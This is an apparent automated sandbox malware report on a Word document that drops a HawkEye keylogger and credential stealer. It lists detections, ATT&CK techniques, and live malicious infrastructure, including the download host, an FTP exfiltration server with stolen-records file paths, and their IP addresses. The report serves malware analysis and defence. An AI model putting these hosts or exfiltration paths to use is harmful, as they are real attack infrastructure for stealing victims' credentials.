            Source: Yara matchFile source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2460, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Detected HawkEye RatShow sources
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt0wVl
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: mHSTOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: mWftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: m]ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
            Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpString found in binary or memory: m&HawkEye_Keylogger_Execution_Confirmed_
            Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpString found in binary or memory: m"HawkEye_Keylogger_Stealer_Records_
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Alternative Protocol1Ingress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable Media1Native API11Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsShared Modules1Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information31Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsExploitation for Client Execution13Logon Script (Mac)Process Injection412Software Packing11Credentials In Files1File and Directory Discovery3Distributed Component Object ModelInput Capture1Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSystem Information Discovery18SSHClipboard Data1Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol33Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemProcess Discovery4Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories2Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 455555 Sample: 280072109764552.doc Startdate: 28/07/2021 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 18 other signatures 2->57 8 EQNEDT32.EXE 12 2->8         started        13 WINWORD.EXE 291 28 2->13         started        process3 dnsIp4 39 vecvietnam.com.vn 103.255.237.180, 49167, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 8->39 31 C:\Users\user\AppData\Roaming\name.exe, PE32 8->31 dropped 33 C:\Users\user\...\09867654270721.PDF[1].exe, PE32 8->33 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->77 15 name.exe 12 3 8->15         started        file5 signatures6 process7 dnsIp8 41 www.google.com 142.250.203.100, 443, 49168 GOOGLEUS United States 15->41 29 C:\Users\user\AppData\...\InstallUtil.exe, PE32 15->29 dropped 43 Multi AV Scanner detection for dropped file 15->43 45 Machine Learning detection for dropped file 15->45 47 Writes to foreign memory regions 15->47 49 3 other signatures 15->49 20 InstallUtil.exe 13 7 15->20         started        file9 signatures10 process11 dnsIp12 35 ftp.vngpack.com 45.141.152.18, 21, 49171, 49172 M247GB Romania 20->35 37 3.246.11.0.in-addr.arpa 20->37 59 Changes the view of files in windows explorer (hidden files and folders) 20->59 61 Writes to foreign memory regions 20->61 63 Allocates memory in foreign processes 20->63 65 2 other signatures 20->65 24 vbc.exe 1 20->24         started        27 vbc.exe 2 20->27         started        signatures13 process14 signatures15 67 Tries to steal Mail credentials (via file registry) 24->67 69 Tries to steal Instant Messenger accounts or passwords 24->69 71 Tries to steal Mail credentials (via file access) 24->71 73 Searches for Windows Mail specific files 24->73 75 Tries to harvest and steal browser information (history, passwords, etc) 27->75

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            280072109764552.doc31%ReversingLabsDocument-RTF.Trojan.Heuristic
            280072109764552.doc100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\name.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe13%ReversingLabsWin32.Trojan.Wacatac
            C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%ReversingLabs
            C:\Users\user\AppData\Roaming\name.exe13%ReversingLabsWin32.Trojan.Wacatac

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
            5.2.InstallUtil.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
            5.2.InstallUtil.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
            4.2.name.exe.3682b02.11.unpack100%AviraTR/Inject.vcoldiDownload File
            4.2.name.exe.3489f22.7.unpack100%AviraTR/Inject.vcoldiDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ns.adobe.c/s0%Avira URL Cloudsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://n.f0%Avira URL Cloudsafe
            https://pki.goog/repository/00%URL Reputationsafe
            http://ns.adobede0%Avira URL Cloudsafe
            http://ftp.vngpack.com0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://ns.ao0%URL Reputationsafe
            http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vecvietnam.com.vn
            103.255.237.180
            truetrue
              unknown
              www.google.com
              142.250.203.100
              truefalse
                high
                ftp.vngpack.com
                45.141.152.18
                truetrue
                  unknown
                  3.246.11.0.in-addr.arpa
                  unknown
                  unknowntrue
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ns.adobe.c/sname.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp, name.exe, 00000004.00000002.2150294891.0000000005113000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/server1.crl0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                      high
                      http://ocsp.entrust.net03name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pki.goog/gsr2/GTS1O1.crt0name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://n.fname.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://pki.goog/repository/0name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schema.org/WebPagename.exe, 00000004.00000002.2141909608.0000000002481000.00000004.00000001.sdmpfalse
                        high
                        http://ns.adobedename.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ftp.vngpack.comInstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.comname.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmpfalse
                          high
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmpfalse
                            high
                            http://ns.aoname.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.pki.goog/GTS1O1core.crl0name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://whatismyipaddress.com/-name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpfalse
                              high
                              https://www.google.com/accounts/serviceloginvbc.exefalse
                                high
                                http://www.%s.comPAname.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2374162693.00000000081A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2180304316.00000000028B0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                low
                                https://login.yahoo.com/config/loginvbc.exefalse
                                  high
                                  http://www.site.com/logs.phpInstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpfalse
                                    high
                                    http://crl.pki.goog/gsr2/gsr2.crl0?name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.nirsoft.net/vbc.exefalse
                                      high
                                      http://ocsp.entrust.net0Dname.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namename.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmpfalse
                                        high
                                        https://secure.comodo.com/CPS0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                                          high
                                          https://www.google.com/name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmpfalse
                                            high
                                            http://crl.entrust.net/2048ca.crl0name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.250.203.100
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              103.255.237.180
                                              vecvietnam.com.vnViet Nam
                                              45899VNPT-AS-VNVNPTCorpVNtrue
                                              45.141.152.18
                                              ftp.vngpack.comRomania
                                              9009M247GBtrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:455555
                                              Start date:28.07.2021
                                              Start time:17:00:20
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 57s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:280072109764552.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.phis.troj.spyw.expl.evad.winDOC@10/15@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 19.7% (good quality ratio 16.4%)
                                              • Quality average: 68.5%
                                              • Quality standard deviation: 37.8%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 131.253.33.200, 13.107.22.200
                                              • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              17:00:42API Interceptor100x Sleep call for process: EQNEDT32.EXE modified
                                              17:00:47API Interceptor154x Sleep call for process: name.exe modified
                                              17:01:05API Interceptor209x Sleep call for process: InstallUtil.exe modified
                                              17:01:21API Interceptor18x Sleep call for process: vbc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              103.255.237.180G0ESHzsrvg.exeGet hashmaliciousBrowse
                                              • www.sukien-freefire12.com/8rg4/?Ktx=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lip1alFcm5QC4IbarA==&OtNDOP=wXOLMFD0PT3lc
                                              6OUYcd3GIs.exeGet hashmaliciousBrowse
                                              • www.sukien-freefire12.com/8rg4/?lJBtHN_=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lil1J1Jf/pQU&_jrxqz=kzrxU82
                                              45.141.152.18Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/xsclk/index.php
                                              Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              e-dekont.html.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              Credit Advice -TT6635993652908.PDF.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/xsclk/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php
                                              e-dekont.html.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              ftp.vngpack.comypBoHI5G3x.exeGet hashmaliciousBrowse
                                              • 45.141.152.18

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              VNPT-AS-VNVNPTCorpVNqvQglSnF3PGet hashmaliciousBrowse
                                              • 123.27.157.193
                                              Js07W5pNr7Get hashmaliciousBrowse
                                              • 14.167.158.195
                                              Ares.arm7Get hashmaliciousBrowse
                                              • 14.239.124.58
                                              yO5PTymk2ZGet hashmaliciousBrowse
                                              • 14.228.128.114
                                              Mozi.mGet hashmaliciousBrowse
                                              • 14.184.163.135
                                              Mozi.mGet hashmaliciousBrowse
                                              • 14.240.105.71
                                              tj2Fh7pIaRGet hashmaliciousBrowse
                                              • 14.250.58.48
                                              qvngtTJzmJGet hashmaliciousBrowse
                                              • 14.180.176.228
                                              LyJM38hR62Get hashmaliciousBrowse
                                              • 14.229.104.4
                                              qU7VOJ667IGet hashmaliciousBrowse
                                              • 14.254.104.187
                                              hHatuKSDpIGet hashmaliciousBrowse
                                              • 113.169.107.76
                                              7eBFEaTKdBGet hashmaliciousBrowse
                                              • 14.241.250.35
                                              j1zDAEIWibGet hashmaliciousBrowse
                                              • 113.176.89.1
                                              8xVa4UKUerGet hashmaliciousBrowse
                                              • 14.179.19.42
                                              U9ZCIleOACGet hashmaliciousBrowse
                                              • 14.185.47.132
                                              DO3yEscfl8Get hashmaliciousBrowse
                                              • 113.191.160.248
                                              skhubz22bYGet hashmaliciousBrowse
                                              • 14.190.83.164
                                              BPQAfGRL9rGet hashmaliciousBrowse
                                              • 14.172.19.107
                                              EM7kj9300xGet hashmaliciousBrowse
                                              • 203.178.35.203
                                              27iqIAFu9eGet hashmaliciousBrowse
                                              • 14.180.21.26
                                              M247GBqvQglSnF3PGet hashmaliciousBrowse
                                              • 38.206.128.109
                                              Purchase confirmation-6232.xlsmGet hashmaliciousBrowse
                                              • 5.61.62.225
                                              ypBoHI5G3x.exeGet hashmaliciousBrowse
                                              • 45.141.152.18
                                              82658.exeGet hashmaliciousBrowse
                                              • 45.141.152.18
                                              lLc1G9C259Get hashmaliciousBrowse
                                              • 185.206.229.147
                                              vTHj1xits9Get hashmaliciousBrowse
                                              • 38.206.10.73
                                              cNqgk3ITHSGet hashmaliciousBrowse
                                              • 38.207.37.118
                                              nNb9qLGPaOGet hashmaliciousBrowse
                                              • 185.158.248.209
                                              2N1tt5eaCnGet hashmaliciousBrowse
                                              • 161.123.233.98
                                              AttachedWaybill.exeGet hashmaliciousBrowse
                                              • 37.120.138.210
                                              UAbJbUWQVk.exeGet hashmaliciousBrowse
                                              • 89.45.4.101
                                              NHnpjXX0sbGet hashmaliciousBrowse
                                              • 196.17.120.85
                                              Paidcheck.pdf.exeGet hashmaliciousBrowse
                                              • 217.138.212.57
                                              List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                              • 5.61.62.219
                                              List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                              • 5.61.62.219
                                              87597.exeGet hashmaliciousBrowse
                                              • 45.141.152.18
                                              NJrrXRv8zVGet hashmaliciousBrowse
                                              • 196.19.8.206
                                              DpuO7oic9y.exeGet hashmaliciousBrowse
                                              • 86.106.143.143
                                              download.dat.exeGet hashmaliciousBrowse
                                              • 194.187.251.163
                                              WindowsFormsApp1.exeGet hashmaliciousBrowse
                                              • 194.187.251.163

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dORDER -ASLF1SR00116 40HC 21T05 DALIAN TO GENOVA..docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Current Vendor Payment Application .docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              sbf 0127365_8106.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              filled_table_revise_it-81443.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              ORDER -ASLF1SR00116-PDF.docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Purchase confirmation-6232.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Remittance Advise.docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              IMG PO 012807_32X.docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Invoice_41292673.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Invoice_41292673.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Invoice_94145565.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              PB T2 new.docxGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              PO-invoice5737747.docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              USD_SLIP.docxGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Order _ 08201450.docGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              PO.2100002.xlsxGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              11.docxGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Item_positions_invoice-541956.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Item_positions_receipt_564965.xlsmGet hashmaliciousBrowse
                                              • 142.250.203.100
                                              Document02.docGet hashmaliciousBrowse
                                              • 142.250.203.100

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\InstallUtil.exePaiement de facture.docGet hashmaliciousBrowse
                                                ORDER SPECIFICATION.docGet hashmaliciousBrowse
                                                  UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.docGet hashmaliciousBrowse
                                                    UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.docGet hashmaliciousBrowse
                                                      Quotations73280126721_Oriental_Fastech_Manufacturing.docGet hashmaliciousBrowse
                                                        PurchaseOrder78902AprilOrderNewRoundBars.docGet hashmaliciousBrowse
